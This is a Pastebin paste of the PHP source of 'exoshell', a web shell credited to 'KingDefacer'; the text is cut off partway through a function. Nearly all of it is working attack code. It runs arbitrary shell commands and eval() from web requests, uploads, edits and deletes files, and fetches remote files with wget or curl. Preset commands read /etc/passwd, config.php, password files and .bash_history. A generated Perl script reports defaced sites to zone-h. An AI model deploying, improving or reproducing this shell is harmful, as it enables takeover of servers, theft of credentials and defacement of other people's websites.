SHARE
TWEET

Untitled

a guest Jul 18th, 2019 53 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?              
  2. /*###########################################
  3. exoshell volume 2.1S
  4.  
  5. Maked In Turk Edited And Translated By KingDefacer
  6. ###########################################*/
  7.  
  8. error_reporting(0);
  9. set_magic_quotes_runtime(0);
  10.  
  11. if(version_compare(phpversion(), '4.1.0') == -1)
  12.  {$_POST   = &$HTTP_POST_VARS;$_GET    = &$HTTP_GET_VARS;
  13.  $_SERVER = &$HTTP_SERVER_VARS;
  14.  }function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
  15. if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
  16. elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
  17. else{return $requ."?".$link."=".$val;}}
  18. function delm($delmtxt){print"<center><table bgcolor=Black  style='border:1px solidDeepSkyBlue  ' width=99% height=2%>";print"<tr><td><b><center><font size=3 color=DeepSkyBlue >$delmtxt</td></tr></table></center>";}
  19. function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
  20. $nscmd=htmlspecialchars($scmd);print $nscmd;}
  21. elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
  22. $ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
  23. elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
  24. while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
  25. print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
  26. ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
  27. ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
  28. print htmlspecialchars($pret);}}
  29. function input($type,$name,$value,$size)
  30. {if (empty($value)){print "<input type=$type name=$name size=$size>";}
  31. elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
  32. elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
  33. else {print "<input type=$type name=$name value=$value size=$size >";}}
  34. function permcol($path){if (is_writable($path)){print "<font color=red>";
  35. callperms($path); print "</font>";}
  36. elseif (!is_readable($path)&&!is_writable($path)){print "<font color=DeepSkyBlue  >";
  37. callperms($path); print "</font>";}
  38. else {print "<font color=DeepSkyBlue >";callperms($path);}}
  39. if ($dlink=="dwld"){download($_REQUEST['dwld']);}
  40. function download($dwfile) {$size = filesize($dwfile);
  41. @header("Content-Type: application/force-download;name=$dwfile");
  42. @header("Content-Transfer-Encoding: binary");
  43. @header("Content-Length: $size");
  44. @header("Content-Disposition: attachment; filename=$dwfile");
  45. @header("Expires: 0");
  46. @header("Cache-Control: no-cache, must-revalidate");
  47. @header("Pragma: no-cache");
  48. @readfile($dwfile); exit;}
  49. ?>
  50. <html>
  51. <head><title>ex0shell Shell & Edited By KingDefacer</title></head>
  52. <style>
  53. BODY {font-family:tahoma; SCROLLBAR-BASE-COLOR: DeepSkyBlue ; SCROLLBAR-ARROW-COLOR: red; }
  54. a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
  55. a:hover{color:red}
  56. input{FONT-WEIGHT:normal;background-color: #000000;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
  57. textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
  58. div{font-size:12px;font-family:tahoma;font-weight:normal;color:DeepSkyBlue  smoke}
  59. select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
  60. <body bgcolor=black text=DeepSkyBlue ><font face="sans ms" size=3>
  61. </body>
  62. </html>
  63. <?
  64. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
  65.  
  66. $sf="<form method=post>";$ef="</form>";
  67. $st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
  68. $et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
  69. $c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
  70. $sta="<textarea cols=157 rows=23>";$eta="</textarea>";
  71. $sfnt="<font face=tahoma size=2 color=DeepSkyBlue  >";$efnt="</font>";
  72. ################# Ending of common variables ########################
  73.  
  74. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=DeepSkyBlue   size=6>    ## ex0 shell EDITED BY KingDefacer ##
  75. </font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
  76. print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('dlink', 'home').">Home</a>";
  77. print " - <a href='javascript:history.back()'>Back</a>";
  78. print " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">phpinfo</a>";
  79. if ($dlink=='phpinfo'){print phpinfo();die();}
  80. print " - <a href=".inclink('dlink', 'basepw').">Base64 decode</a>";
  81. print " - <a href=".inclink('dlink', 'urld').">Url decode</a>";
  82. print " - <a href=".inclink('dlink', 'urlen').">Url encode</a>";
  83. print " - <a href=".inclink('dlink', 'mdf').">Md5</a>";
  84. print " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>Check permissions</a>";
  85. print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>File source</a>";
  86. print " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>Quick index</a>";
  87. print " - <a href=".inclink('dlink', 'zone')."&scdir=$nscdir>Zone-h</a>";
  88. print " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
  89. print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd help</a>";
  90. if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase']));  
  91. print "<p>Result is : $sfnt".$cbase."$efnt";  die();}
  92. if ($dlink=="basepw"){ print "<p><b>[ Base64 - Decoder ]</b>";
  93. print $sf;input ("text","ncbase",$ncbase,35);print " ";
  94. input ("submit","","Decode","");print $ef; die();}
  95. if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld']));  
  96. print "<p>Result is : $sfnt".$urldc."$efnt";  die();}if ($dlink=='urld'){
  97. print "<p><b>[ Url - Decoder ]</b>";   print $sf;
  98. input ("text","nurld",$nurld,35);print " ";
  99. input ("submit","","Decode","");print $ef; die();}
  100. if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen'])));  print "<p>Result is : $sfnt".$urlenc."$efnt";  die();}
  101. if ($dlink=='urlen'){print "<p><b>[ Url - Encoder ]</b>";  
  102. print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();}
  103. if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf']));  
  104. print "<p>Result is : $sfnt".$mdfe."$efnt";  die();}if ($dlink=='mdf'){
  105. print "<p><b>[ MD5 - Encoder ]</b>";
  106. print $sf;input ("text","nmdf",$nmdf,35);print " ";
  107. input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef;
  108. print "<pre>";print "<p><textarea cols=120 rows=12>";
  109. if (isset($_REQUEST['mfldr'])){callfuncs('find . -type d -perm -2 -ls');
  110. }elseif (isset($_REQUEST['sfldr'])){callfuncs('find ../ -type d -perm -2 -ls');
  111. }print "</textarea>";print "</pre>";die();}
  112. function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){
  113. print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
  114. elseif(isset($showsc)&&filesize($showsc) !=="0") {
  115. print "<p><table width=100% height=10% bgcolor=#dadada border=1><tr><td>";
  116. if (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){
  117. print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>";
  118. input ("text","showsc","",35);print " ";
  119. input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
  120. if ($dlink=='cmdhlp'){
  121. print "<p><b>: Insert the command below to get help or to know more about it's uses :";print "<form method=get>";
  122. input ("text","hlp","",35);print " ";
  123. input ("submit","","Help","");print $ef; die();}
  124. if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];
  125. print "<p><b>[ The command is $sfnt".$hlp."$efnt ]";
  126. $hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#dadada border=2><tr><td>";
  127. if (!function_exists(shell_exec)&&!function_exists(exec)&&
  128. !function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
  129. {print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=black>";
  130. if(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Finished !! ]";}print "</pre></font>";}print "</td></tr></table>";die();}
  131. if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
  132. {if (touch ($_REQUEST['indx'])==true){
  133. $fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
  134. fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>
  135. ] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
  136. if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
  137. print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
  138. Your index contents here</textarea></p>";
  139. input ("text","indx","Index-name",35);print " ";
  140. input ("submit","qindsub","Create","");print $ef;die();}
  141. if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
  142. $mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
  143. if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
  144. if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
  145. print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
  146. Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
  147. input ("submit","mailsub","Send-mail","");print $ef;die();}
  148. if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
  149. function callzone($nscdir){
  150. if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
  151. else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
  152. fwrite ($fpz,"\$arq = @ARGV[0];
  153. \$grupo = @ARGV[1];
  154. chomp \$grupo;
  155. open(a,\"<\$arq\");
  156. @site = <a>;
  157. close(a);
  158. \$b = scalar(@site);
  159. for(\$a=0;\$a<=\$b;\$a++)
  160. {chomp \$site[\$a];
  161. if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
  162. print \"[+] Sending \$site[\$a]\n\";
  163. use IO::Socket::INET;
  164. \$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
  165. print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
  166. print \$sock \"Accept: */*\r\n\";
  167. print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
  168. print \$sock \"Accept-Language: pt-br\r\n\";
  169. print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
  170. print \$sock \"Connection: Keep-Alive\r\n\";
  171. print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
  172. print \$sock \"Host: old.zone-h.org\r\n\";
  173. print \$sock \"Content-Length: 385\r\n\";
  174. print \$sock \"Pragma: no-cache\r\n\";
  175. print \$sock \"\r\n\";
  176. print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";
  177. close(\$sock);}");
  178. if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);
  179. }else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
  180. if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
  181. {print "[ Can't complete the operation !! ]";}
  182. else {callfuncs("chmod 777 $zpl;chmod 777 $li");
  183. ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
  184. print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
  185. }if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
  186. print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
  187. www.site1.com
  188. www.site2.com
  189. </textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
  190. input ("submit","zonesub","Send","");print $ef;die();}
  191. print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
  192. function inisaf($iniv) { $chkini=ini_get($iniv);
  193. if(($chkini || strtolower($chkini)) !=='on'){print"<font color=green ><b>OFF ( NOT SECURITY )</b></font>";} else{
  194. print"<font color=red><b>Acik ( Guvenli )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
  195. if ($chkin==""){print " <font color=red><b>None</b></font>";}
  196. else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=DeepSkyBlue  >".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
  197. elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
  198. while (!feof($opop)){ $nval= fgetc($opop);}}
  199. elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
  200. ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
  201. if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
  202. else{print"<font color=DeepSkyBlue  ><b>OFF</b></font>";} }
  203. print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>";
  204. print"<tr><td>"; print"<center><br>";
  205. print"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>";
  206. if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>";
  207. print "<div align=center>"; print"<br><b>Mysql : </b>";
  208. callocmd('which mysql','/usr/bin/mysql');
  209. print"</td>"; print"<td>"; print"<br><b>Perl : </b>";
  210. callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>";
  211. callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>";
  212. print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>";
  213. callocmd('which GET','/usr/bin/GET');
  214. print"</td>"; print"<td>";print"<br><b>Wget : </b>";
  215. callocmd('which wget','/usr/bin/wget');
  216. print"</td>"; print"<td>"; print"<br><b>Lynx : </b>";
  217. callocmd('which lynx','/usr/bin/lynx');
  218. print"</td>"; print "</tr></table>"; }print "<hr><br>";
  219. print "<b>YOUR IP: ".$REMOTE_ADDR."<br></b>";
  220. print "<b>Server IP : ".$SERVER_ADDR."</b>";
  221. print"<br><b>".$SERVER_SIGNATURE."</b>";
  222. print "<b>Server NAME : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>";
  223. print "<b>Disabled Functions : </b>";inifunc(disable_functions);print"<br>";
  224. print "<b>Your Infos : <b>"; callfuncs('id');print"<br><b>Os : </b>";
  225. if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
  226. if (!function_exists(shell_exec)&&!function_exists(exec)&&
  227. !function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
  228. {print php_uname(); print "/";print PHP_OS;}
  229. else {callfuncs('uname -a');}}print"<br>";
  230. print"Php-Version : ".phpversion(); print"<br><b>Current-path : </b>";
  231. print $nscdir."&nbsp;&nbsp;&nbsp;&nbsp; [ ";permcol($nscdir);print " ]";
  232. print"<br>";print "Your shells location : " .__file__;
  233. print"<br> Disc Spase: "; readable_size(disk_total_space($nscdir));print " / ";
  234. print"Bos Alan: "; readable_size(disk_free_space($nscdir));
  235. print "</center><br></font>"; print"</td></tr></table><br>";
  236. if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']);
  237. if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }
  238. else{$mess="Make Dir/ Delete";}}elseif (isset($_REQUEST['deldir']))
  239. { $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}}
  240. else{$mess="Make Dir/ Delete";}if(isset($_REQUEST['crefile'])){
  241. $ncfile=trim($_REQUEST['cfile']);
  242. if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);}
  243. else{ $mess3= "Make a File/ Delete";}}
  244. elseif(isset($_REQUEST['delfile'])){
  245. $ndfile=trim($_REQUEST['cfile']);
  246. if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";}
  247. else {$mess3= "Make Dir/ Delete";}}
  248. else {$mess3="Make a File/ Delete";}
  249. class upload{ function upload($file,$tmp){
  250. $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}
  251. if (@copy($tmp,$nscdir."/".$file)){
  252. print "<div><center><b>:<font color=DeepSkyBlue  > $file </font>uploaded successfully :</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } }
  253. $obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
  254. $ustname=trim ($_REQUEST['ustname']);ob_start();
  255. if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
  256. if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
  257. if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
  258. if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
  259. if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
  260. if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
  261. if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
  262. if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
  263. if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}
  264. if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
  265. !isset($_REQUEST['rfiletxt'])){
  266. if ($dh  = dir($nscdir)){ while (true == ($filename =$dh->read())){
  267. $files[] = $filename; sort($files);}print "<br>";
  268. print"<center><table bgcolor=#2A2A2A style=\"border:1px solid black\" width=100% height=6% ></center>";
  269. print "<tr><td width=43% style=\"border:1px solid black\">";
  270. print "<center><b>Files";print "</td>";
  271. print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Size";print "</td>";
  272. print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Write";print "</td>";
  273. print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Read";print "</td>";
  274. print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Type";print "</td>";
  275. print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Edit";print "</td>";
  276. print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Rename";print "</td>";
  277. print "<td width=6% style=\"border:1px solid black\">";print "<center><b>Download";print "</td>";if(strstr(PHP_OS,"Linux")){
  278. print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Owner";print "</td>";}
  279. print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Permission";print "</td></tr>"; foreach ($files as $nfiles){
  280. if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
  281. if (is_writable("$nscdir/$nfiles")){
  282. $scmess2= "<center><font color=DeepSkyBlue  >yes";}else {$scmess2="<center><font color=red>Hayir";}if (is_readable("$nscdir/$nfiles")){
  283. $scmess3= "<center><font color=DeepSkyBlue  >yes";}else {$scmess3= "<center><font color=red>Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>Dir";}else{$scmess4= "<center><font color=DeepSkyBlue  >File";}
  284. print"<tr><td style=\"border:1px solid black\">";
  285. if (is_dir($nfiles)){print "<font face= tahoma size=2 color=DeepSkyBlue  >[ $nfiles    ]<br>";}else {print "<font face= tahoma size=2 color=#dadada>$nfiles <br>";}
  286. print"</td>"; print "<td style=\"border:1px solid black\">";
  287. print "<center><font face= tahoma size=2 color=#dadada>";
  288. if (is_dir("$nscdir/$nfiles")){print "<b>K</b>Dir";}
  289. elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
  290. print "</td>"; print "<td style=\"border:1px solid black\">";
  291. print "<center><font face= tahoma size=2 >$scmess2"; print "</td>";
  292. print"<td style=\"border:1px solid black\">";
  293. print "<center><font face= tahoma size=2 >$scmess3"; print "</td>";
  294. print "<td style=\"border:1px solid black\">";
  295. print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";
  296. print "<td style=\"border:1px solid black\">";if(is_file("$nscdir/$nfiles")){
  297. print " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>Edit</a>";}else {print "<center><font face=tahoma size=2 color=gray>D�zenle</center>";}print"</td>";  print "<td style=\"border:1px solid black\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Rename</a>";print"</td>";print "<td style=\"border:1px solid black\">";
  298. if(is_file("$nscdir/$nfiles")){
  299. print " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>Download</a>";}else {print "<center><font face=tahoma size=2 color=gray>indir</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
  300. print "<td style=\"border:1px solid black\">";
  301. print "<center><font face=tahoma size=2 color=#dadada>";owgr($nfiles);
  302. print "</center>";print"</td>";}
  303. print "<td style=\"border:1px solid DeepSkyBlue  \">";print "<center><div>";
  304. permcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>";
  305. }print "</table>";print "<br>";}else {print "<div><br><center><b>[ Can't open the Dir, permission denied !! ]<p>";}}
  306. elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
  307. if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}
  308. print "<pre><center>".$sta;
  309. if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
  310. elseif(isset($_REQUEST['eval'])){
  311. ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
  312. $ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
  313. elseif (isset($_REQUEST['subqcmnds'])){
  314. if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
  315. if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
  316. if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
  317. if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
  318. if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
  319. if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
  320. if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
  321. if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
  322. if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
  323. if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
  324. if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
  325. if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
  326. if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
  327. }print $eta."</center></pre>";}
  328. function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
  329. if(is_readable($rfile)&&is_file($rfile)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top